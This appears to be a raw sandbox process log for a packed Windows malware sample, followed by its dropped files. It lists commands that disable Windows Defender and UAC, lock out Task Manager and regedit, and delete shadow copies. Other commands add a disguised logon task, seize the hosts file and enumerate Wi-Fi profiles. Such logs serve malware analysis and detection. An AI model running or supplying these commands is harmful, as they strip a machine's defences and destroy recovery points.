C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.pyw'"

C:\Windows\System32\Wbem\wmic.exe

wmic product get name

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /f /im firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"

C:\Windows\system32\icacls.exe

icacls "C:\Users" /grant Admin:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts

C:\Windows\SYSTEM32\setx.exe

setx PATH "C:\$Sys-Manager;C:\Users\Admin\AppData\Local\Temp\_MEI39922\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI23842\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\reg.exe

reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Checkpoint-Computer -Description \"Windows Update\" -RestorePointType \"MODIFY_SETTINGS\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo %USERNAME%"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"

C:\Windows\system32\netsh.exe

netsh wlan show interfaces

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

Network

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23842\gevent-24.11.1.dist-info\INSTALLER

C:\Users\Admin\AppData\Local\Temp\_MEI23842\python312.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI23842\python3.DLL

C:\Users\Admin\AppData\Local\Temp\_MEI23842\libffi-8.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\libcrypto-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_wmi.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_uuid.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\pyexpat.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_ssl.pyd

\??\c:\users\admin\appdata\local\temp\_mei23842\zope.interface-7.2.dist-info\namespace_packages.txt

C:\Users\Admin\AppData\Local\Temp\_MEI23842\setuptools-75.8.0.dist-info\METADATA

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_asyncio.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\yarl\_quoting_c.cp312-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\multidict\_multidict.cp312-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_overlapped.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI23842\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

C:\Users\Admin\AppData\Local\Temp\_MEI23842\libssl-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_queue.pyd

